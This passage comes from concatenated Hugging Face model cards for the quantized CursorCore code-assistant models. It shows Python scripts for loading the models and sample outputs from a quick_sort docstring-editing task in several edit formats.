outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-1.5B-LC-AWQ | TechxGenus | 2024-10-10T06:42:18Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-10-06T14:22:17Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-1.5B-LC
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning the models with data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
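Since this repository hosts the AWQ-quantized weights, they can be loaded through the usual `transformers` API as long as the `autoawq` package is installed; the quantization config stored in the checkpoint is picked up automatically. Below is a minimal sketch (the dtype and device settings are illustrative assumptions), and the resulting `model` and `tokenizer` can be substituted into the scripts in the next section:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

# Load the AWQ checkpoint from this repository; requires the `autoawq` package.
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-QW2.5-1.5B-LC-AWQ")
model = AutoModelForCausalLM.from_pretrained(
    "TechxGenus/CursorCore-QW2.5-1.5B-LC-AWQ",
    torch_dtype=torch.float16,  # AWQ kernels run in half precision
    device_map="auto"
)
````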
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for the AI-assisted programming task. It is designed to align anything during the programming process and is used to implement features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-1.5B-LC-GPTQ | TechxGenus | 2024-10-10T06:42:15Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-1.5B-LC",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:54:37Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-1.5B-LC
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning the models with data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
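Since this repository hosts the GPTQ-quantized weights, they load through the same `transformers` API once `optimum` and a GPTQ backend such as `auto-gptq` are installed. The snippet below is a sketch under those assumptions; the resulting `model` and `tokenizer` can be dropped into the scripts in the next section:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

# Load the GPTQ checkpoint from this repository; requires `optimum` plus a GPTQ backend such as `auto-gptq`.
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-QW2.5-1.5B-LC-GPTQ")
model = AutoModelForCausalLM.from_pretrained(
    "TechxGenus/CursorCore-QW2.5-1.5B-LC-GPTQ",
    torch_dtype=torch.float16,  # GPTQ kernels run in half precision
    device_map="auto"
)
````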
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for the AI-assisted programming task. It is designed to align anything during the programming process and is used to implement features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-QW2.5-1.5B-GPTQ | TechxGenus | 2024-10-10T06:42:00Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-QW2.5-1.5B",
"base_model:quantized:TechxGenus/CursorCore-QW2.5-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:54:07Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-QW2.5-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
